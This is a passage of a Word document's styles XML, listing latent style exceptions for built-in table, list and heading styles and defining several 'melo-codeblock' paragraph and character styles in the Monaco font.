    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="footnote reference"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Colorful 2"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 6"/>
    <w:lsdException w:uiPriority="43" w:name="Plain Table 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="footer"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 1"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="line number"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 8"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 4"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Keyboard"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading"/>
    <w:lsdException w:qFormat="true" w:uiPriority="34" w:name="List Paragraph"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet 5"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 3"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2"/>
    <w:lsdException w:name="heading 4" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 1"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 9"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 5"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="No List"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 5"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 6"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 4"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 5"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Elegant"/>
    <w:lsdException w:uiPriority="40" w:name="Grid Table Light"/>
    <w:lsdException w:qFormat="true" w:uiPriority="32" w:name="Intense Reference"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 2"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 5"/>
    <w:lsdException w:name="TOC Heading" w:qFormat="true" w:uiPriority="39" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Theme"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table 3D effects 2"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List 5"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 1"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 4"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 3"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Simple 2"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="envelope address"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 3"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 3"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 5"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 6"/>
    <w:lsdException w:name="heading 9" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 2"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="footnote text"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 1"/>
    <w:lsdException w:qFormat="true" w:uiPriority="31" w:name="Subtle Reference"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 6"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Unresolved Mention"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Mention"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 1"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 6"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 2"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Acronym"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text First Indent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Contemporary"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Sample"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 8"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 4"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 6"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Normal (Web)"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Web 2"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 6"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Signature"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Document Map"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Normal Indent"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 5"/>
    <w:lsdException w:uiPriority="41" w:name="Plain Table 1"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 1"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 3"/>
    <w:lsdException w:qFormat="true" w:uiPriority="22" w:name="Strong"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="annotation reference"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Smart Hyperlink"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 1"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 1"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 2"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 1"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 4"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful"/>
    <w:lsdException w:qFormat="true" w:uiPriority="30" w:name="Intense Quote"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 6"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Classic 3"/>
    <w:lsdException w:name="caption" w:qFormat="true" w:uiPriority="35" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="toa heading"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table 3D effects 1"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="annotation text"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 4"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 4"/>
    <w:lsdException w:name="heading 5" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 2"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 5"/>
    <w:lsdException w:name="heading 2" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 4"/>
    <w:lsdException w:qFormat="true" w:uiPriority="0" w:name="Normal"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Web 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="macro"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 3"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 1"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 6"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 2"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 3"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 5"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 1"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 4"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue 3"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 2"/>
    <w:lsdException w:qFormat="true" w:uiPriority="20" w:name="Emphasis"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List 4"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="endnote reference"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Block Text"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 4"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 3"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 1"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 8"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Closing"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 2"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Hashtag"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 9"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 1"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 3"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Smart Link"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Classic 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Cite"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index heading"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 8"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 1"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 2"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="E-mail Signature"/>
    <w:lsdException w:qFormat="true" w:uiPriority="9" w:name="heading 1"/>
    <w:lsdException w:semiHidden="true" w:name="Placeholder Text"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 1"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 6"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 1"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue 2"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Outline List 3"/>
    <w:lsdException w:uiPriority="44" w:name="Plain Table 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 7"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Hyperlink"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 1"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 3"/>
    <w:lsdException w:qFormat="true" w:uiPriority="11" w:name="Subtitle"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 2"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 6"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Code"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 6"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 3"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 5"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 4"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="FollowedHyperlink"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet 2"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text"/>
    <w:lsdException w:qFormat="true" w:uiPriority="21" w:name="Intense Emphasis"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 6"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 4"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 4"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 5"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 5"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 2"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 2"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table 3D effects 3"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 5"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 4"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 5"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 6"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Outline List 2"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Outline List 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Variable"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 3"/>
    <w:lsdException w:qFormat="true" w:uiPriority="33" w:name="Book Title"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="1" w:name="Default Paragraph Font"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Date"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Simple 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 4"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 2"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 7"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 1"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 2"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Balloon Text"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="table of figures"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 1"/>
    <w:lsdException w:name="heading 6" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="header"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 4"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1"/>
    <w:lsdException w:uiPriority="45" w:name="Plain Table 5"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 5"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 2"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 6"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 5"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Message Header"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 5"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue 5"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Simple 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Normal Table"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="annotation subject"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 2"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Colorful 1"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Classic 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 4"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 4"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 1"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 5"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 3"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="37" w:name="Bibliography"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 6"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 3"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 3"/>
    <w:lsdException w:qFormat="true" w:uiPriority="19" w:name="Subtle Emphasis"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Note Heading"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 1"/>
    <w:lsdException w:name="heading 8" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text 3"/>
    <w:lsdException w:qFormat="true" w:uiPriority="1" w:name="No Spacing"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 3"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text Indent 3"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 5"/>
  </w:latentStyles>
  <w:style w:styleId="kh7pln" w:type="paragraph">
    <w:name w:val="melo-codeblock-Normal-theme-para"/>
    <w:basedOn w:val="fio6k3"/>
    <w:next w:val=""/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="i1daeq" w:type="paragraph">
    <w:name w:val="melo-codeblock-Normal-theme-para"/>
    <w:basedOn w:val="hvhiyh"/>
    <w:next w:val=""/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="k8m4nv" w:type="character">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="0qxvyo"/>
    <w:next w:val=""/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="true"/>
    <w:rPr>
      <w:color w:themeColor="hyperlink" w:val="1E6FFF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="4eedb4" w:default="true" w:type="numbering">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:styleId="hvhiyh" w:type="paragraph">
    <w:name w:val="melo-codeblock-Base-theme-para"/>
    <w:basedOn w:val="ablt93"/>
    <w:next w:val=""/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="360" w:after="0" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="cepcot" w:type="character">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="fhbhlo"/>
    <w:next w:val=""/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="true"/>
    <w:rPr>
      <w:color w:themeColor="hyperlink" w:val="1E6FFF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="tjw08u" w:type="paragraph">
    <w:name w:val="melo-codeblock-Normal-theme-para"/>
    <w:basedOn w:val="hakx65"/>
    <w:next w:val=""/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="fio6k3" w:type="paragraph">
    <w:name w:val="melo-codeblock-Base-theme-para"/>
    <w:basedOn w:val="ablt93"/>
    <w:next w:val=""/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="360" w:after="0" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="ablt93" w:default="true" w:type="paragraph">
    <w:name w:val="Normal"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:jc w:val="left"/>
    </w:pPr>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hakx65" w:type="paragraph">
    <w:name w:val="melo-codeblock-Base-theme-para"/>
    <w:basedOn w:val="ablt93"/>
    <w:next w:val=""/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="360" w:after="0" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="c4c15d" w:default="true" w:type="character">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:styleId="c2puz6" w:type="character">
    <w:name w:val="melo-codeblock-Base-theme-char"/>
    <w:basedOn w:val=""/>
    <w:next w:val=""/>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="oth9xn" w:type="paragraph">
    <w:name w:val="melo-codeblock-Base-theme-para"/>
    <w:basedOn w:val="ablt93"/>
    <w:next w:val=""/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="360" w:after="0" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
